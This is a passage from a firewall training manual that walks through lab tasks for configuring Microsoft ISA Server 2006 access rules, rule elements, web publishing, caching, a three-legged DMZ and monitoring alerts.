If an allow rule applies to the request, ISA Server will allow the request.
The rst rule that is a match for the traffic being inspected is the rule that
will apply. This is why ordering is important. ISA Server checks the rule
elements that make up an access rule in this order:
Protocol
Source address and port
Schedule
Destination address
User set
Content groups
Incoming Requests
ISA Server calls rules that control incoming requests publishing rules. These rules
are designed to allow you to securely allow access to servers by clients on a dif-
ferent network. Incoming requests are controlled by the ISA Server publishing
policy. The publishing policy is built from web publishing rules, server publishing
rules, secure web publishing rules, and mail server publishing rules. These rules,
in addition to any web chaining rules, control how incoming requests to pub-
lished servers are handled.
ISA Server has several types of publishing rules that you can use to control how
resources are accessed. These are:
Web publishing rules. Used to publish web server content.
Secure web publishing servers. To publish Secure Sockets Layer (SSL)
content.
Mail Server publishing rules: Used to publish Mail servers across ISA
Server.
Server publishing rules. Used to publish all other internal resource content.
Remember that access rules that deny traffic are processed before publishing rules
that permit traffic. Your access rules must not explicitly deny any traffic that you
intend to publish.
Access rules that deny trafc
are processed before
publishing rules that allow
trafc. If a request matches a
deny access rule, the request
will be denied, because ISA
Server will never get to the
publishing rule that would
have permitted the request.
Lesson 5: Conguring Firewalls 225
TASK 5B-5
Creating a Basic Access Rule
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. In this task,
you will work with a partner in the classroom to test your con-
guration of an access rule. You will need to ask your partner
for his or her IP address before you being the task.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. In the Console Tree pane, expand the container named after your server.
3. Select the Firewall Policy container.
4. Notice in the Details pane that the only rule that exists is the default deny
rule.
5. Open a command prompt.
6. Type ipconfig and then press Enter.
7. Ping your default gateway.
What was your result?
Outbound Ping Allowed from your ISA Server.
8. Ping your partners External IP address.
What was your result?
Your partners ISA Server blocked the inbound Ping request on his or her
external interface.
9. Minimize the command prompt.
10. In the Tasks pane, under Firewall Policy Tasks, click the Create Access
Rule link.
226 Tactical Perimeter Defense
11. On the New Access Rule Wizard dialog box, in the Access Rule Name
eld,enter Inbound Ping to External Interface and then click Next.
12. In the Rule Action dialog box, select the Allow option and then click Next.
13. In the Protocols dialog box, click the Add button.
14. In the Add Protocols dialog box, expand Common Protocols and select
PING, click Add, and then click Close.
15. In the Protocols dialog box, click Next.
Lesson 5: Conguring Firewalls 227
16. In the Access Rule Sources dialog box, click the Add button.
17. In the Network Entities dialog box, expand Networks, select External, and
click Add. Then, click Close.
18. In the Access Rule Sources dialog box, click Next.
19. In the Access Rule Destination dialog box, click the Add button.
20. In the Network Entities dialog box, expand Network Sets, select All Pro-
tected Networks, and click Add. Then, click Close.
21. In the Access Rule Destination dialog box, click Next.
22. In the User Sets dialog box, accept the default of All Users and click
Next.
23. Click Finish.
24. At the top of the Firewall Policy Details pane, click Apply.
25. In the Saving Conguration Changes dialog box click OK.
26. Wait at this step until both partners have completed the previous steps.
27. Restore the command prompt.
28. Ping your partners external IP address.
What was your result?
Ping was allowed to the external interface of your partner.
29. Minimize the command prompt.
30. In the Details pane, select the Inbound Ping To External Interface rule.
228 Tactical Perimeter Defense
31. In the Tasks pane, click the Disable Selected Rules link.
32. At the top of the Firewall Policy Details pane, click Apply.
33. In the Saving Conguration Changes dialog box, read the note below the
progress bar and then click OK.
34. Wait at this step until both partners have completed the previous step.
35. Restore the command prompt.
36. Ping your partners external IP address.
What was your result?
Ping was allowed to the external interface of your partner even though the
rule was disabled. This is because you already had an existing connection to
your partner from the initial successful ping test.
Note: If you are not able to ping your partners IP address, enable the rule
again, ping your partner, and then disable the rule.
37. Choose StartControl PanelNetwork ConnectionsExternal.
38. In the External Status dialog box, click the Disable button. This will break
your existing connection to your partner.
39. Wait at this step until both partners have completed the previous step of
disabling the External NIC.
40. Choose StartControl PanelNetwork ConnectionsExternal. This
will enable your external connection.
41. Wait at this step until both partners have completed the previous step.
42. Restore the command prompt.
Lesson 5: Conguring Firewalls 229
43. Ping your partners external IP address.
What was your result
Ping is now blocked again by the ISA Server rewall policy.
44. In the Details pane, select the Inbound Ping To External Interface rule.
45. In the Tasks pane, click the Delete Selected Rules link.
46. In the Conrm Delete dialog box, click Yes.
47. At the top of the Firewall Policy Details pane, click Apply.
48. In the Saving Conguration Changes dialog box, click OK.
49. Close all open windows.
It is important to remember that any rules you add to the rewall policy will not
take effect on any connections that are already established. This is because ISA
Server 2006 is a stateful rewall and those connections are currently listed in the
state tables. Stateful rewalls consult the state tables before parsing the rewall
rules. If the connection is listed in the state table, it will not be checked against
the rule set again until it is removed from the state table either through a time out
or by the source terminating the connection. You can force the state table to reset
for all connections by disabling and enabling the network interface that the con-
nection is associated with.
ISA Server 2006 Access Rule Elements
There are eight basic access rule elements that are used to build ISA Server 2006
access rules when creating a rewall policy. These elements describe specic
characteristics of a network traffic packet that ISA Server can inspect and use for
rule comparison. The elements that ISA Server 2006 uses to create a protocol rule
are:
Name: This is used by ISA Server to display the rules contained in the
rewall policy container in the management console. Using descriptive, easy
to understand names will help you keep track of what each rule is intended
to do.
Action: This is the action ISA Server will take when the rule is triggered by
a match. The two possible actions are Allow or Deny. Action elements can
also be congured to log requests that match a rule or redirect HTTP
requests on a rule match to a web page.
Protocols: This element describes the protocol and port that the rule will
match.
Network: These elements describe the device addresses or network nodes
that the rule will apply to. It is used in building the following two rule ele-
ments:
Source: This element describes where the packet is coming from.
230 Tactical Perimeter Defense
Destination: This element describes where the packet is going to.
Users: This element describes the user or groups of users that the rule will
apply to.
Schedule: This element describes the days and times that the rule will be
enforced.
Content Types: This element describes the network data packet contents that
the rule will be applied to.
ISA Server 2006 has a robust set of access rule elements pre-congured when it
is installed. However, you can easily create additional rule elements that meet
your specic requirements when the default rule elements will not address the
rule you are trying to create. Since it is impossible to predict what type of traffic
any given network may require, the ability to create additional rule elements
gives ISA Server 2006 the exibility to adapt to any requirements.
TASK 5B-6
Creating a Protocol Rule Element
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. In this
exercise, you will create a custom protocol element that you
could use to network traffic for a custom network application
that uses TCP port 2120 inbound across your rewall with
return client connections dynamically established across the
range of 49152-65535.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. Expand the Console Tree pane and select the Firewall Policy container.
3. In the Tasks pane, select the Toolbox tab.
4. On the Toolbox tab, expand the Protocols container.
5. Explore the various default protocol elements that are dened by default.
6. On the Toolbox tab, under the Protocols container, click the New drop-
down menu, and select Protocols.
7. In the New Protocol Denition Wizard dialog box, in the Protocol Denition
Name eld, type Custom Application Protocol and then click Next.
8. In the Primary Connection Information dialog box, click the New button.
9. In the New/Edit Protocol Connection dialog box, enter the following values
and then click OK.
Protocol type: TCP
Direction: Inbound
Port Range:
From: 2120
Lesson 5: Conguring Firewalls 231
To: 2120
10. In the Primary Connection Information dialog box, click Next.
11. In the Secondary Connections dialog box, under Do You Want To Use Sec-
ondary Connections? select the Yes radio button, and then click New.
12. In the New/Edit Protocol Connection dialog box, enter the following values
and then click OK.
Protocol type: TCP
Direction: Outbound
Port Range:
From: 49152
To: 65535
13. In the Secondary Connection Information dialog box, click Next.
14. In the New Protocol Denition Wizard, click Finish.
15. Notice that your new User-Dened protocol now shows in the Toolbox Pro-
tocols area.
16. At the top of the Details pane, click the Apply button.
17. In the Saving Conguration Changes dialog box, click OK.
18. Close the ISA Server 2006 Management console.
232 Tactical Perimeter Defense
TASK 5B-7
Creating a User Rule Element
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. In this
exercise, you will create a user element just for the administra-
tor account. As an example, this user element could then be
used in an access rule to deny the administrator account access
to any external resources on the external network.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. Expand the Console Tree pane and select the Firewall Policy container.
3. In the Task pane, select the Toolbox tab and then expand the Users
container.
4. Notice that ISA Server has three default user elements pre-dened.
5. At the top of the Users container, click the New link.
6. In the New User Set Wizard, in the User Set Name eld, type Administrator
Account and then click Next.
7. In the Users dialog box, click the Add button, and from the pop-up
menu, choose Windows Users And Groups.
8. In the Select User Or Groups dialog box, click the Advanced button.
9. In the Select User Or Groups dialog box, click the Find Now button.
10. In the Search results list, select the Administrator account and then click
OK. Note, be sure you do not select the Administrators Group.
11. In the Select User Or Groups dialog box, verify that the Administrator
account appears and then click OK.
12. In the Users dialog box, click Next.
13. In the New Users Set dialog box, click Finish.
14. Notice that your new user set appears in the toolbox pane.
Lesson 5: Conguring Firewalls 233
15. At the top of the Details pane, click the Apply button.
16. In the Saving Conguration Changes dialog box, click OK.
17. Close the ISA Server 2006 Management console.
Content Types
ISA Server 2006 comes precongured with a variety of content types by default.
If your targeted content type is not already dened, it is an easy task to congure
a custom content type to suit your organizations needs.
ISA Server 2006s deep packet inspection allows ISA Server to control not only
traffic based not only on source, destination, protocol and port, but also on con-
tent type. This is useful in enforcing an organizations security policy when it
forbids certain types of content for security or other reasons. For example, your
organizations security policy forbids the downloading of executable .exe les
from the Internet. You could create a content type for .exe les and then assign
the new content type to a deny access rule to block any content that contains a
.exe le.
TASK 5B-8
Creating a Content Group Rule Element
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. Expand the Console Tree pane and select the Firewall Policy container.
3. In the Task pane, select the Toolbox tab.
4. In the Toolbox tab of the Task pane, expand the Content Types section.
5. Examine the pre-dened content types. Notice that .exe les are not
dened.
234 Tactical Perimeter Defense
6. Under the Content Types heading, click the New link.
7. In the New Content Type Set dialog box, in the Name eld, type Exe Files
8. In the New Content Type Set dialog box, from the Available Types drop-
down list, select the .exe type and then click Add.
9. In the New Content Type Set dialog box, click OK. The new Exe Files con-
tent type appears in the Content Types list.
10. At the top of the Details pane, click Apply.
11. In the Saving Conguration Changes dialog box, click OK.
Lesson 5: Conguring Firewalls 235
ISA Server 2006 Scheduling
ISA Server 2003 has the ability to create and use schedules to control when cer-
tain access rules are in effect. Schedules can be used in conjunction with other
access rule components when creating an access rule to specify the times and/or
days that the rule is enforced.
TASK 5B-9
Creating and Modifying Schedule Rule Elements
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks.
1. In ISA Server Management, expand the Console Tree pane and select the
Firewall Policy container.
2. In the Task pane, select the Toolbox tab.
3. In the Toolbox tab of the Task pane, expand the Schedules section.
4. Notice that there are two pre-dened schedules: Weekends and Work Hours.
5. Select the Work hours schedule and then click the Edit link.
6. In the Work hours Properties dialog box, click the Schedule tab.
7. Notice that the schedule contains a grid comprised of 7 week days and 24
hours in one-hour increments.
8. Notice that each one-hour block of time can be set to either Active or Inac-
tive on the schedule.
9. Click and drag your cursor from Monday 8:00 A.M. to Friday 8:00 P.M.
and then click the Active radio button to extend the work hours to start at
8:00 A.M. instead of 9:00 A.M, and extend to 9 P.M. Monday through
Friday.
10. Click and drag your cursor from Monday 12:00 P.M. to Friday 12:00
P.M. and then click the Inactive radio button to remove the lunch hour
from the Work hours schedule.
11. Click OK to close the Work Hours Properties dialog box.
12. On the Toolbox tab, under the Schedules area, click the New link.
13. In the New schedule dialog box, in the Name eld, type After hours
14. Click and drag your mouse pointer in the schedule eld from Monday
at 8:00 A.M. to Friday at 8:00 P.M. to cover the workday hours and then
click the Inactive radio button.
15. In the New Schedule dialog box, click OK.
236 Tactical Perimeter Defense
16. At the top of the Details pane, click Apply.
17. In the Saving Conguration Changes dialog box, click OK.
You have now modied the existing Work hours schedule and created a new
schedule for After hours. These schedules can be used in rule creation to control
what times a rule is enforced by ISA Server 2006. This adds a great deal of ex-
ibility to your ability to congure and enforce rewall policies.
Using Content Types and Schedules in Rules
You have discovered that ISA Server has Content Types and Schedules that can
be used in rule creation. As a practical example, these objects could be used to
enforce an organizations acceptable use policy that states that viewing video con-
tent is prohibited during normal work hours but allows video content during
lunch and after hours. Using the schedule feature in ISA Server 2006 allows you
to create a schedule that can be incorporated into a rule governing video content
to enforce the organizations acceptable use policy.
TASK 5B-10
Using Content Types and Schedules in Rules
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks.
1. In ISA Server Management, expand the Console Tree pane and select the
Firewall Policy container.
2. In the Task pane, select the Tasks tab.
3. In the Tasks pane, under Firewall Policy Tasks, click the Create Access
Rule link.
Lesson 5: Conguring Firewalls 237
4. In the New Access Rule Wizard dialog box, in the Access Rule Name
eldtype Enforce Video Content Policy and click Next.
5. In the Rule Action dialog box, select the Deny radio button and then click
Next.
6. In the Protocols dialog box, from the This Rule Applies To drop-down list,
select All Outbound Traffic and then click Next.
7. In the Access Rule Sources dialog box, click the Add button.
8. In the Network Entities dialog box, expand Network Sets, select All Pro-
tected Networks, click Add, and then click Close.
9. In the Access Rule Sources dialog box, click Next.
10. In the Access Rule Destination dialog box, click the Add button.
11. In the Network Entities dialog box, expand Network Sets, select All Net-
works (and Local Host), and click Add. Then, click Close.
12. In the Access Rule Destination dialog box, click Next.
13. In the User Sets dialog box, accept the default of All Users and click
Next.
14. Click Finish.
15. On the Tasks tab, under Policy Editing Tasks, click the Edit Selected Rule
link.
238 Tactical Perimeter Defense
16. Notice that the rule property dialog box has tabs for each of the items we
congured during rule creation (General, Action, Protocols, From, To and
Users) and it also contains two additional tabs: Schedule and Content type.
17. Click the Schedule tab, and from the Schedule drop-down list, select Work
hours.
18. Click the Content Types tab and select the Selected content type radio
button.
19. Scroll down in the Content Types list and select the Video Content Type
and then click OK.
20. At the top of the Firewall Policy Details pane, click Apply.
21. In the Saving Conguration Changes dialog box, click OK.
22. The ISA Server rewall will now enforce our video policy during work
hours.
ISA Server 2006 Network Rule Elements
You have discovered that ISA Server 2006 uses a set of elements as the building
blocks for access rules. Networks are rule elements, which are made up of one or
more ranges of network IP addresses or other network identier characteristics.
Lesson 5: Conguring Firewalls 239
ISA Server 2006 network elements include one or more computers, typically cor-
responding to a physical network. You can apply rules to one or more networks
or to all addresses except those in the specied network. ISA Server 2006 creates
network elements for the following objects:
Networks
Network Sets
Computers
Address Ranges
Subnets
Computer Sets
URL Sets
Domain Name Sets
Web Listeners
Server Farms
ISA Server 2006 has a set of default network elements that are pre-dened. You
can use these default elements as part of an access rule denition or you can cre-
ate custom network elements to meet your specic needs.
TASK 5B-11
Creating a Network Rule Element
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous task.
1. In ISA Server Management, Expand the Console Tree pane and select the
Firewall Policy container.
2. In the Task pane, select the Toolbox tab.
3. In the Toolbox tab of the Task pane, expand the Network Objects
container.
4. Examine the pre-dened Network Objects.
240 Tactical Perimeter Defense
5. On the Toolbox tab, at the top of the Network Objects container, click the
New drop-down menu, and choose Computer from the pop-up menu.
6. In the New Computer Rule Element dialog box, enter the following values
and then click OK:
Name: [Your computer name]
Computer IP Address: [Your computer IP address]
Description: ISA Firewall
7. At the top of the Firewall Policy Details pane, click Apply.
8. In the Saving Conguration Changes dialog box, click OK.
We could now use this new Network Object as an element in an access rule that
would only apply to the ISA Server 2006 rewall at our IP address.
Lesson 5: Conguring Firewalls 241
ISA Server Publishing Rules
Up to this point, we have primarily been concerned with access rules and their
constituent elements. Access rules in ISA Server 2006 are designed to control
traffic that transverses the rewall from the unprotected network (external) to the
protected network (internal). But how does ISA Server 2006 make protected
resources, such as a web server, available to external access? For this external
access purpose, ISA Server has publishing rules. Publishing rules apply to traffic
requests for resources on the internal protected network.
Publishing rules are made up of similar elements to an access rule with one
notable exception: Publishing rules require a Listener element to be created. The
listener element describes what interface ISA Server should be listening on for
access requests to the internal resource dened in the publishing rule.
Figure 5-18: Features and benets of ISA Server content publishing.
TASK 5B-12
Configuring a Web Publishing Rule
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. In this
exercise, you will create an ISA Server publishing rule to
allow external access to an internal website.
1. In ISA Server Management, expand the Console Tree pane and select the
Firewall Policy container.
2. In the Tasks pane, select the Tasks tab.
242 Tactical Perimeter Defense
3. On the Tasks tab, under the Firewall Policy Task section, click the Publish
Web Sites link.
4. In the New Web Publishing Rule Wizard, in the Web Publishing Rule Name
eld, type Public Web Server and click Next.
5. In the Select Rule Action dialog box, select the Allow radio button and
click Next.
6. In the Publishing Type dialog box, select the Publish A Single Web Site Or
Load Balancer option and click Next.
7. On the Connection Security tab, select the Use Non-secured Connections
To The Published Web Server Or Server Farm option and then click
Next.
8. In the Internal Publishing Details dialog box, enter the following values:
Internal site name: www.securitycertied.net.
Computer name or IP address: 10.X.Y.100 (Where X and Y are the sec-
ond and third octets of your internal interface (loopback adapter).
Click Next.
9. In the Internal Publishing Details dialog box, in the Path (Optional) eld,
type /* and click Next.
10. In the Public Name Details dialog box, in the Public Name eld, type www.
securitycertied.net and click Next.
11. In the Select Web Listener dialog box, click the New button.
Lesson 5: Conguring Firewalls 243
12. In the New Web Listener Denition Wizard dialog box, in the Web Listener
Name eld, type Public Web Listener and click Next.
13. In the Client Connection Security dialog box, select the Do Not Require
SSL Secured Connections With Clients option and click Next.
14. In the Web Listener IP Addresses dialog box, select the External Network
and click Next.
15. In the Authentication Settings dialog box, from the Select How Clients Will
Provide Credentials To ISA Server drop-down list, select No Authentication
and click Next.
16. Read the Single Sign On Settings dialog box and then click Next.
17. In the Completing The New Web Listener Wizard, click Finish.
18. In the Select Web Listener dialog box, click Next.
19. In the Authentication Delegation dialog box, select the No Delegation, and
client cannot authenticate directly option and click Next.
20. In the User Sets dialog box, accept the default of All Users and click
Next.
21. In the Completing the New Web Publishing Rule Wizard dialog box, click
Finish.
22. At the top of the Firewall Policy Details pane, click Apply.
23. In the Saving Conguration Changes dialog box, click OK.
24. The new publishing rule appears at the top of the Details pane.
25. In the Tasks pane, click the Toolbox tab and then expand the Network
Objects container.
26. Expand the Web Listener container. (Note: you may need to refresh your
screen with F5 to perform this step.)
27. The web listener created during the publishing rule creation is now listed.
You may have to click another container in the Console Tree pane and then
reselect the Firewall Policy container to refresh the screen.
You have now congured a Web Publishing rule that will use a web listener to
listen for inbound requests from the external network for www.securitycertied.
net and then forward them to the internal web server. Since only port 80 is
exposed to the external network, and ISA Server is inspecting the inbound HTTP
packets before passing them on to the internal web server, the security footprint
of your web server is greatly enhanced.
244 Tactical Perimeter Defense
ISA Server 2006 Caching
Caching is a method where frequent requests for remote resources or content are
stored locally on the ISA Server. By maintaining a centralized cache of frequently
requested content, both network bandwidth consumption and browser perfor-
mance are enhanced. Caching is disabled by default when you install ISA Server
2006, so you will need to enable and congure caching if you want to take
advantage of the performance benets this feature offers.
ISA Server supports two types of caching: forward caching and reverse caching.
Forward caching provides internal clients with improved access times to external
resources, while reverse caching provides the same benets to external clients
accessing web content that has been published through ISA Server. When you
create a cache rule, it applies to all applies to requested sites, regardless of the
source network.
ISA Server allows organizations to congure caching to preload entire websites
into cache on a dened schedule. Scheduling cache downloads will help keep
cache content up-to-date for your users and also ensure that content for offline
web servers that have been cached is available to your users.
ISA Server has a caching algorithm that allows it to make intelligent decisions
about when certain content is no longer requested on a regular basis. This algo-
rithm enables ISA Server to ush low request content from RAM cache to disk
cache so that cache remains as efficient as possible.
ISA Server has three main conguration items for controlling caching:
Cache Drive Settings
Cache Drive Rules
Content Download Jobs
TASK 5B-13
Enabling and Configuring Caching
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks.
1. In ISA Server Management, expand the Console Tree pane and select the
Cache container.
2. Notice that the Cache container has a red down arrow on it in the Console
Tree pane, indicating that it is currently not enabled.
3. Notice that the Details pane contains three tabs corresponding to the three
conguration items for caching discussed earlier.
4. Notice that the Cache Size on NTFS Drives is currently zero.
5. In the Tasks pane, under Cache Drive Tasks, click the Dene Cache Drives
(Enable Caching) link.
6. In the Dene Cache Drives dialog box, in the Maximum Cache Size (MB)
eld, type 100 and then click the Set button.
Lesson 5: Conguring Firewalls 245
7. Drive C now shows a cache size of 100. If you had multiple drive arrays on
your ISA Server, each partition formatted with NTFS would show as an
option in this dialog box.
8. In the Dene Cache Drives dialog box, click OK.
9. At the top of the Firewall Policy Details pane, click Apply.
10. In the ISA Server Warning dialog box, select Save The Changes And
Restart The Services radio button and click OK. (This may take a
momentbe patient!)
11. In the Saving Conguration Changes dialog box, click OK.
12. In the Details pane, click the Cache Rules tab.
13. Notice that two default rules have been pre-dened.
ISA Server comes with a pre-dened cache rule for the Microsoft Update
site. This can help speed up automatic downloads of patches by clients or
WUS servers.
14. On the Tasks tab, under the Cache Rules Tasks, click the Create A Cache
Rule link.
15. In the New Cache Rule Wizard, in the Cache Rule Name eld, type Security
Certied Web Site and click Next.
16. In the Cache Rule Destination dialog box, click Add.
17. In the Add Network Entities dialog box, expand the Network Sets object.
18. In the Add Network Entities dialog box, select the All Protected Networks
object.
19. In the Add Network Entities dialog box, click Add .
20. In the Add Network Entities dialog box, click Close.
21. In the Cache Rule Destination dialog box, click Next.
22. In the Content Retrieval dialog box, select the Only If A Valid Version Of
The Object Exists In The Cache. If No Valid Version Exists, Route The
Request To The Server. option and then click Next.
23. In the Cache Content dialog box, check the Dynamic Content check box.
246 Tactical Perimeter Defense
24. In the Cache Content dialog box, check the Content For Offline Browsing
(302, 307 Responses) check box and click Next.
25. In the Cache Advanced Conguration dialog box, click Next.
26. In the HTTP Caching dialog box, accept the defaults and click Next.
27. In the FTP Caching dialog box, deselect the Enable FTP Caching option
and then click Next.
28. In the New Cache Rule Wizard dialog box, click Finish.
29. At the top of the Details pane, click the Apply button.
30. In the Saving Conguration Changes dialog box, click OK.
31. In the Details pane, select the Content Download Jobs tab.
32. In the Tasks pane, click the Schedule A Content Download Job link.
33. Read the Enable Schedule Content Download Jobs dialog box and then
click Yes. (This will congure the required options to schedule a content
download job.)
34. At the top of the Details pane, click the Apply button.
Lesson 5: Conguring Firewalls 247
35. In the Saving Conguration Changes dialog box, click OK.
36. In the Task pane, click the Schedule A Content Download Job link.
37. In New Content Download Job Wizard dialog box, in the Content Download
Job Name eld, type Security Certied Web Site Download and click Next.
38. In the Download Frequency dialog box, select the Daily option and click
Next.
39. In the Daily Frequency dialog box, under the Job Start Date eld, set the
date to start tomorrow and then click Next.
40. In the Content Download dialog box, type http://www.securitycertied.net as
the URL, select the Do Not Follow Link Outside The Specied URL
Domain Name option.
41. In the Content Download dialog box, select the Maximum Depth Of Links
Per Page option.
42. In the Content Download dialog box set the Maximum Depth Of Links
Per Page value to 4 and click Next.
43. In the Content Caching dialog box, accept the default Cache Content and
TTL settings and click Next.
44. In the Completing the Scheduled Content Download Job Wizard dialog box,
click Finish.
45. Your new content download job appears in the details pane.
46. Close ISA Server 2006 Management console.
248 Tactical Perimeter Defense
Configuring ISA Server 2006 Network Templates
Earlier in this topic, we discovered that ISA Server 2006 uses rule elements
called networks to dene one or more ranges of IP addresses. Networks usually
correspond to a physical network. In addition to the access rule network element,
ISA Server 2006 includes a new feature: network templates, which are aligned to
the common rewall network topologies. These network templates can be used to
congure the rewall policy required rule elements that are used in ISA rules-
based traffic control between networks.
The Console Tree pane networks container provides you with three tabs in the
Details pane that allow you to congure your network elements. These congura-
tion tabs are:
Network Sets
Network Rules
Web Chaining
Currently, our ISA Server rewall is congured as a perimeter or edge rewall. If
we add a third network interface to the ISA Server, we can then re-congure the
network topology to include a DMZ and create a three-legged DMZ rewall
topology. This type of upgrade is not uncommon in the real world. ISA Server
makes it easy to re-congure through the use of pre-dened network templates.
TASK 5B-14
Install Second Microsoft Loop Back Adapter and Assign
an IP Address
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator, have completed the previous tasks, and have access to
the Windows 2003 Server installation source les.
1. Choose StartControl PanelAdd Hardware.
2. In the Welcome dialog box, click Next.
3. Select Yes, I Have Already Connected The Hardware and click Next.
4. Scroll to the bottom of the Installed Hardware list box and select Add A
New Hardware Device. Then, click Next.
5. Select the Install The Hardware That I Manually Select From A List
(Advanced) option and click Next.
6. Under Common Hardware Types, select Network Adapters, and then click
Next.
7. Under Manufacturer, select Microsoft.
8. Under Network Adapter, select Microsoft Loopback Adapter.
9. Click Next twice.
10. If required, click OK in the Insert Disk dialog box.
Lesson 5: Conguring Firewalls 249
11. Enter the path to the Windows 2003 Server installation source les in
the Files Needed dialog box and then click OK. (Windows Server 2003
should remember that source path from the rst loopback adapter we
installed earlier).
12. Click Finish.
13. Choose StartControl PanelNetwork ConnectionsLocal Area
Connection.
14. In the Local Area Connection dialog box, click Properties.
15. In the This Connection Uses The Following Items list, select Internet Pro-
tocol (TCP/IP) and then click Properties.
16. On the General tab, select Use The Following IP Address and enter the
address from the table below that corresponds to your computer name.
WIN-R01 - 192.168.16.1/24 WIN-L01 192.168.18.1/24
WIN-R02 - 192.168.16.2/24 WIN-L02 192.168.18..2/24
WIN-R03 - 192.168.16.3/24 WIN-L03 192.168.18.3/24
WIN-R04 - 192.168.16.4/24 WIN-L04 192.168.18.4/24
WIN-R05 - 192.168.16.5/24 WIN-L05 192.168.18.5/24
WIN-R06 - 192.168.16.7/24 WIN-L06 192.168.18.6/24
WIN-R07 - 192.168.16.8/24 WIN-L07 192.168.18.7/24
WIN-R08 - 192.168.16.8/24 WIN-L08 192.168.18.8/24
Note that the subnet mask is 255.255.255.0 for all these IPs.
17. Leave the DNS value blank and then click OK.
18. Click Close to close the NIC Properties.
19. Choose StartControl Panel and right-click Network Connections.
From the context menu, choose Open.
20. Right-click the Local Area Connection, and from the context menu,
choose Rename.
21. Name the connection DMZ
22. Close the Network Connections window.
You have now installed a second Microsoft Loopback adapter and assigned it a
unique IP address. We will be using this adapter to function as our DMZ network
adapter to congure ISA server 2006 in a three-legged DMZ.
250 Tactical Perimeter Defense
TASK 5B-15
Configure ISA Server 2006 in a Three-legged DMZ
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. You will
recongure your network as a three-legged DMZ topology. To
accomplish this, you must rst import the originalcfg.xml le
to remove the web access policy listener that you congured
in the publishing task.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. In the Console Tree pane, select the [Your Server Name] container.
3. In the Tasks pane, click the Import (Restore) This ISA Server Congura-
tion link.
4. In the Import Wizard dialog box, click Next.
5. In the Select The Import File dialog box, in the File Name eld, type
C:\originalcfg.xml and click Next. Alternatively, you could use the Browse
button to locate the le.
6. In the Import Action dialog box, select the Overwrite (Restore) option and
then click Next.
7. In the Import Preferences dialog box, check the Import User Permission
Settings check box, and then click Next.
8. In the Completing The Import Wizard dialog box, click Finish.
9. Read the ISA Server warning dialog box and then click OK twice.
10. At the top of the Details pane, click the Apply button.
11. In the Saving Conguration Changes dialog box, click OK.
12. In the Console Tree pane, select the Firewall Policy container. Notice that
the rewall rule sets in the Details pane are back to the defaults.
13. In the Console Tree pane, select the Networks container.
14. In the Tasks pane, expand Conguration, and select the Templates tab.
Lesson 5: Conguring Firewalls 251
15. On the Templates tab, select the 3-Leg Perimeter template.
16. In the Welcome To The Network Template Wizard dialog box, click Next.
17. In the Export The ISA Server Conguration dialog box, click Next.
18. In the Internal Network IP Addresses dialog box, click Next.
19. In the Perimeter Network IP Addresses dialog box, click Add Adapter.
20. In the Select Network Adapters dialog box, select the DMZ network and
click OK.
21. In the Perimeter Network IP Addresses dialog box, click Next.
22. In the Select A Firewall Policy dialog box, scroll down and select the
Allow Limited Web Access policy. Then, click Next.
23. In the Completing The Network Template Wizard dialog box, click Finish.
24. At the top of the Details pane, click the Apply button.
25. In the Saving Conguration Changes dialog box, click OK.
26. In the Console Tree pane, select the Firewall Policy container.
27. Highlight the Web Access Only Firewall Policy.
28. Notice that there are new access rules congured based on the template
options we chose in the previous steps.
252 Tactical Perimeter Defense
Configuring ISA Server Monitoring
ISA Server 2006 has a robust set of monitoring features. By conguring alerts,
reporting, performance monitoring and logging, you can see at a glance the status
and health of your ISA Server 2006 rewall. The Monitoring Details pane has the
largest number of tabs associated with it of any of the ISA Console Tree pane
containers. Spend plenty of time learning about each of the monitoring features
and working with their conguration. The more skilled you are with this toolset,
the easier it is to manage your ISA Server 2006 rewall.
These features are summarized in the following table.
Figure 5-19: ISA Server 2006 monitoring features.
The ISA Server 2006 Management console can be used to gather at a glance
information on the status of your ISA Server. To view the real-time monitoring
information, open the Management console and select the Monitoring container
from the Console Tree pane. This will activate the Monitoring Details pane. On
the Dashboard tab of the Monitoring Details pane, you will nd visual displays of
current monitoring information. The refresh rate of this display is congurable in
the task pane. Each of the individual information displays can also be collapsed
to make more screen room for other displays.
Lesson 5: Conguring Firewalls 253
Figure 5-20: The Monitoring Details pane Dashboard tab.
TASK 5B-16
Working with Alerts
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous tasks. In this task,
you will congure a custom alert for network disconnections
and assign it actions to perform when the alert is triggered.
1. In ISA Server, with the Console Tree pane open, select the Monitoring
container.
2. In the Details pane, select the Alerts tab.
3. In the Tasks pane, click the Congure Alert Denitions link.
254 Tactical Perimeter Defense
4. In the Alerts Properties dialog box, scroll briey though the list and look
at the wide range of pre-congured alerts in ISA Server. Then, click
Add.
5. In the New Alert Wizard dialog box, in the Alert Name eld, type Network
Interface Disconnected and click Next.
6. In the Events And Conditions dialog box, from the Event drop-down list,
select Network Conguration Changed, from the Additional Condition
drop-down list, select Network Disconnected. Click Next.
7. In the Category And Severity dialog box, from the Category drop-down list,
select Network Load Balancing, from the Severity drop-down list, select
Error and click Next.
8. In the Actions dialog box, select the Send An E-mail Message and the
Report The Event To The Windows Event Log options and then click
Next.
Lesson 5: Conguring Firewalls 255
9. In the Sending E-mail Messages dialog box, enter the following values:
SMTP server: smtp.securitycertied.net
From: isa2006@securitycertied.net
To: yourname@securitycertied.net
Click Next.
10. In the Completing The New Alert Conguration Wizard, click Finish.
11. In the Alerts Properties dialog box, scroll down and ensure that your new
Network Interface Disconnected alert is selected, then click OK.
12. At the top of the Details pane, click the Apply button.
